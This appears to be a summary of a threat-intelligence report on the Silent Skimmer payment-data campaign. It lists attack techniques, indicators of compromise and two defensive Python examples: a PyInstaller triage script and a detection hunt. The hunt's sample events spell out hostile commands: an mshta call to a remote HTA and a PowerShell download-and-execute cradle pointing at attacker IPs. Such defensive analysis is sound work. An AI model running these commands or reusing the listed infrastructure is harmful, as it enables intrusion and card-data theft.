Key points
- Unit 42 observed a resurgence of the Silent Skimmer campaign in May 2024 targeting payment infrastructure.
- The adversary gained initial access by exploiting Telerik UI vulnerabilities (CVE-2017-11317 and CVE-2019-18935).
- Attackers deployed web shells and PowerShell reverse shells and used tunneling/reverse-proxy tools (Fuso, FRP) to maintain access.
- Post-exploitation tools included GodPotato for privilege escalation, a RingQ loader to reflectively load payloads, and Cobalt Strike for further activity.
- The group used mixed-mode .NET assemblies and MSHTA/LOLbins to evade analysis and execute remote HTA/PowerShell payloads.
- A compiled Python executable with hard-coded credentials was used to dump payment data from a victim database to a CSV for exfiltration.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used Telerik UI vulnerabilities to gain initial access (‘The threat actor gained an initial foothold on the servers by exploiting a couple of one-day Telerik user interface (UI) vulnerabilities.’)
- [T1203] Exploitation for Defense Evasion/Execution – Executed malicious scripts and binaries via web shells and PowerShell (‘Following the vulnerabilities’ exploitation, the attacker executed multiple reconnaissance commands and gained persistence.’)
- [T1059] Command and Scripting Interpreter (Persistence via scripts) – Installed and used web shells and reverse shells to maintain access (‘The attacker uploaded multiple web shells’ and ‘dropped and executed multiple reverse shells’).
- [T1068] Exploitation for Privilege Escalation – Leveraged GodPotato to elevate privileges (‘We observed the attacker using GodPotato for privilege escalation.’)
- [T1140] Deobfuscate/Decode Files or Information (Defense Evasion) – Used mixed-mode assemblies to hide native code inside .NET binaries to hinder analysis (‘mixed-mode assemblies were used to embed native C++ code within a .NET binary… make the analysis process more difficult’).
- [T1003] Credential Dumping – Dumped payment information via a compiled Python script connecting to the victim database (‘the threat actor used a compiled Python script… dump payment information to a .csv file’).
- [T1071] Application Layer Protocol (Command and Control) – Established C2 connectivity via reverse shells and HTA/PowerShell payloads hosted at C2 addresses (‘The IP address in the URL was also used as the command and control (C2) IP address for the reverse shell.’)
Indicators of Compromise
- [SHA256] Malware and tool hashes – 55271d94eb3c95bb6a1965d44bade5ecef5ff610e87133f169e602eb94c39d6b (RingQ Loader), 12508b830149c2d84f2c80947e78218128d16a834c8d0695068f3e773ac62ef9 (GodPotato), and ~30 more hashes.
- [IP address] Command-and-control hosts – 48[.]218.138.60 (hosting GodPotato payloads), 172[.]86.96.245 (MSHTA/HTA hosting), and other C2 IPs listed for this campaign.
- [URL] Payload drop locations – http://20.222.194[.]41/SecurityHealthSystray.hta (MSHTA payload), http://13.78.113[.]103/One.ps1 (PowerShell payload).
- [Domain / FQDN] Exfiltration / connectivity checks – nigntboxcdn[.]com used for exfiltration and f9e5e09788.ipv6.1433.eu.org for connectivity checks.
- [File names / scripts] Script artifacts – 129-80.hta (HTA reverse shell script), One.ps1 / logtest.ps1 (PowerShell reverse shells).
In May 2024 Unit 42 tracked a renewed Silent Skimmer campaign that targeted web servers hosting payment systems by exploiting known Telerik UI flaws (CVE-2017-11317 and CVE-2019-18935). After gaining initial access, the actor uploaded multiple web shells and deployed PowerShell-based reverse shells and tunneling tools (Fuso, FRP) to expose internal servers and maintain persistent remote access.
The attackers used a varied toolset: GodPotato for privilege escalation, RingQ as a loader that reflectively loads payloads in memory (sometimes masquerading as legitimate software), and mixed-mode .NET/C++ assemblies to hide native payloads and complicate analysis. They also used MSHTA and other LOLBins to proxy execution of remote HTA/PowerShell payloads, and later dropped a compiled Python executable (packed with PyInstaller) that connected to internal databases using hard-coded credentials and dumped payment records into CSV files.
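When a suspected compiled-Python dumper like the one described above turns up on a server, the first triage step is confirming that the binary is PyInstaller output and noting which Python runtime it bundles. The following is an added example, not code from the report or from Unit 42: it searches a file for PyInstaller's archive cookie and decodes it. The cookie layout (`!8sIIII64s`, beginning with the magic `MEI\x0c\x0b\x0a\x0b\x0e`) is my understanding of PyInstaller's CArchive format and is an assumption of this example; `build_constructed_sample()` fabricates a stand-in binary so the script runs offline. Recovering the hard-coded credentials themselves would require unpacking the compressed archive entries, which this example deliberately does not do.

```python
import struct

# PyInstaller CArchive cookie (assumption: layout as in PyInstaller's own reader).
# Fields: magic, package length, TOC offset, TOC length, Python version, pylib name.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FORMAT = "!8sIIII64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88 bytes


def find_pyinstaller_cookie(data: bytes):
    """Return decoded cookie fields if `data` looks like a PyInstaller bundle, else None.

    Onefile bundles append the archive to the bootloader, so the cookie normally
    sits at the very end of the file; rfind() tolerates trailing data such as an
    Authenticode signature.
    """
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FORMAT, data[pos:pos + COOKIE_SIZE]
    )
    # Newer PyInstaller encodes 3.11 as 311; older releases encoded 3.7 as 37.
    if pyvers >= 100:
        major, minor = divmod(pyvers, 100)
    else:
        major, minor = divmod(pyvers, 10)
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": f"{major}.{minor}",
        "pylib_name": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a PyInstaller onefile binary (not a real sample)."""
    bootloader = b"MZ" + bytes(range(256)) * 4      # fake PE bootloader bytes
    payload = b"\x00" * 512                           # fake compressed archive entries
    toc = b"\x00" * 64                                # fake table of contents
    cookie = struct.pack(
        COOKIE_FORMAT, PYINSTALLER_MAGIC,
        len(payload) + len(toc) + COOKIE_SIZE, len(payload), len(toc),
        311, b"python311.dll",
    )
    return bootloader + payload + toc + cookie


def triage_file(path: str):
    """Convenience wrapper for use on a real file during incident response."""
    with open(path, "rb") as fh:
        return find_pyinstaller_cookie(fh.read())


if __name__ == "__main__":
    info = find_pyinstaller_cookie(build_constructed_sample())
    print("PyInstaller bundle:", info)
    print("Plain file:", find_pyinstaller_cookie(b"MZ" + b"\x00" * 1000))
```

A positive result justifies pulling the binary for deeper analysis (the bundled scripts are a strong lead on which database and table the dumper targets) and checking database logs for connections from the web server with the same account.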
Unit 42 observed numerous C2 IPs, URLs, and file hashes linked to the campaign and noted overlaps with prior Silent Skimmer activity reported by other vendors. The main operational differences this time were the use of a compiled Python dumper for payment data and the RingQ loader; otherwise the group’s TTPs remain aligned with previous web-facing exploitation and web shell-based persistence.
Recommendations: immediately identify and patch internet-facing Telerik UI instances, hunt for web shells, MSHTA/PowerShell executions, and the listed C2 indicators, and engage incident response if compromise is suspected. Rapid patching and monitoring of known CVEs remain critical to block this financially motivated cluster.
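The hunt the recommendations call for, applied to process-creation telemetry, can be expressed as a few rules plus an indicator match. The script below is an added example and not Unit 42's code: it refangs the defanged indicators listed in this summary and runs three detections over constructed Sysmon-style events (not events from the report): mshta.exe launched with a remote URL, a PowerShell download cradle, and an interpreter spawned by the IIS worker process w3wp.exe (assumption: the Telerik UI hosts run IIS, which is typical for ASP.NET). Event field names and the sample command lines are my own construction.

```python
import re

# Indicators copied from the summary above, kept defanged and restored at runtime.
DEFANGED_IOCS = [
    "48[.]218.138.60", "172[.]86.96.245", "20.222.194[.]41", "13.78.113[.]103",
    "nigntboxcdn[.]com", "f9e5e09788.ipv6.1433.eu.org",
]


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOCS = sorted(refang(i) for i in DEFANGED_IOCS)

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b|\biwr\b|-e(nc|ncodedcommand)?\b",
    re.I,
)
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "certutil.exe"}

# Constructed events in a flat Sysmon Event ID 1 style (assumed field names).
SAMPLE_EVENTS = [
    {"host": "WEB01", "image": r"C:\Windows\System32\mshta.exe", "parent": "w3wp.exe",
     "cmdline": "mshta http://20.222.194.41/SecurityHealthSystray.hta"},
    {"host": "WEB01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "mshta.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://13.78.113.103/One.ps1')\""},
    {"host": "APP02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "explorer.exe", "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"host": "WEB01", "image": r"C:\Windows\System32\cmd.exe", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "DEV03", "image": r"C:\Program Files\Git\cmd\git.exe", "parent": "cmd.exe",
     "cmdline": "git.exe fetch https://github.com/example/repo"},
]


def analyze(event: dict) -> list:
    """Return the list of detection names that fire for one process-creation event."""
    findings = []
    cmd = event["cmdline"]
    exe = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower()

    # MSHTA proxying execution of a remote HTA (LOLBin pattern from the campaign).
    if exe == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta_remote_hta")
    # PowerShell fetching or decoding a remote payload.
    if exe in ("powershell.exe", "pwsh.exe") and CRADLE_RE.search(cmd):
        findings.append("powershell_download_cradle")
    # Web-shell behaviour: the IIS worker process should not spawn interpreters.
    if parent == "w3wp.exe" and exe in INTERPRETERS:
        findings.append("iis_worker_spawned_interpreter")
    # Known C2 / payload hosts from the report, matched on token boundaries.
    for ioc in IOCS:
        if re.search(r"(?<![\w.])" + re.escape(ioc) + r"(?![\w.])", cmd, re.I):
            findings.append(f"ioc:{ioc}")
    return findings


def hunt(events):
    """Run analyze() over a batch and keep only events with at least one finding."""
    return [(ev["host"], ev["cmdline"], analyze(ev)) for ev in events if analyze(ev)]


if __name__ == "__main__":
    for host, cmdline, findings in hunt(SAMPLE_EVENTS):
        print(f"{host}: {findings}\n    {cmdline}")
```

The parent-process rule is the most durable of the three: URLs and IPs rotate between campaigns, but an interpreter whose parent is w3wp.exe is a reliable web shell signal on a server that should not be running such commands at all.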
Read more: https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/